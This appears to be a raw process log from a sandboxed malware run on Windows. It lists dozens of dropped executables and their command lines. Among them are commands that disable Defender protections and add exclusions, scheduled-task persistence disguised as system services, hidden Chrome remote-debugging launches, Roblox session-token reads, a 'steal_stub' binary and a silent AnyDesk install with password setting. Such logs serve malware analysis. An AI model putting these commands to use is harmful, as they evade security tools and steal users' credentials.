"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe"

C:\Users\Admin\Desktop\Files\yiklfON.exe

"C:\Users\Admin\Desktop\Files\yiklfON.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\Winlogoh.exe'

C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2928 /prefetch:2

C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe"

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe'

C:\Windows\SysWOW64\msiexec.exe

msiexec /i vcredist.msi

C:\Users\Admin\Desktop\Files\W4KLQf7.exe

"C:\Users\Admin\Desktop\Files\W4KLQf7.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3560 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7804 -ip 7804

C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7804 -s 984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp

"C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp" /SL5="$604C2,1888137,52736,C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\test30.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\test30.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2260 -ip 2260

C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe

"C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 1300

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5792 -ip 5792

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 816

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\SigniantApp_Installer_1.5.1806.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\SigniantApp_Installer_1.5.1806.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,9703890498806811226,5172444833401426519,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe

"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\wmfdist.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\wmfdist.exe"

C:\Windows\SYSTEM32\msiexec.exe

msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall

C:\Users\Admin\Desktop\Files\steal_stub.exe

"C:\Users\Admin\Desktop\Files\steal_stub.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe"

C:\Users\Admin\Desktop\Files\yiklfON.exe

"C:\Users\Admin\Desktop\Files\yiklfON.exe"

C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe

"C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe"

C:\Users\Admin\Desktop\Files\steal_stub.exe

"C:\Users\Admin\Desktop\Files\steal_stub.exe"

C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe

"C:\Program Files (x86)\½ðÈðÐÐÇé½»Ò×ϵͳ\FuturesClient.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe"

C:\Users\Admin\Desktop\Files\seksiak.exe

"C:\Users\Admin\Desktop\Files\seksiak.exe"

C:\Users\Admin\Desktop\Files\file.exe

"C:\Users\Admin\Desktop\Files\file.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\Desktop\New Text Document mod.exse\a\leto.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\leto.exe"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y8B03.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y8B03.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\dxwebsetup.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dxwebsetup.exe"

C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Oi8sKAHNLo7W.bat" "

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Itaxyhi.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Itaxyhi.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\XClient.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9586.tmp\9587.tmp\9588.bat "C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe""

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2368,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2360 /prefetch:2

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1896,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2468 /prefetch:3

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1996,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2580 /prefetch:8

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3120,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:1

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3280 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 6100 -ip 6100

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6100 -s 1132

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2472,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2360 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7480 -ip 7480

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7480 -s 1072

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost'

C:\Users\Admin\Desktop\Files\seksiak.exe

"C:\Users\Admin\Desktop\Files\seksiak.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3568,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2376 /prefetch:1

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2384,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4484 /prefetch:1

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4824,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4860 /prefetch:1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nfdKjErmBbK1.bat" "

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E0D7.tmp\E0D8.tmp\E0D9.bat "C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe""

C:\Users\Admin\Desktop\New Text Document mod.exse\a\dismhost.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dismhost.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\AdvancedRun.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AdvancedRun.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\Desktop\New Text Document mod.exse\a\5dismhost.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\5dismhost.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2504,i,7916531082753508051,15203361096745521831,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Users\Admin\Desktop\New Text Document mod.exse\a\4dismhost.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4dismhost.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"

C:\Users\Admin\AppData\Roaming\AnyDesk.exe

C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Users\Admin\Desktop\Files\seksiak.exe

"C:\Users\Admin\Desktop\Files\seksiak.exe"

C:\Users\Admin\Desktop\New Text Document mod.exse\a\2dismhost.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\2dismhost.exe"

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\Desktop\New Text Document mod.exse\a\3dismhost.exe

"C:\Users\Admin\Desktop\New Text Document mod.exse\a\3dismhost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gE7h5o8ADRYV.bat" "

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "

\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe

"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

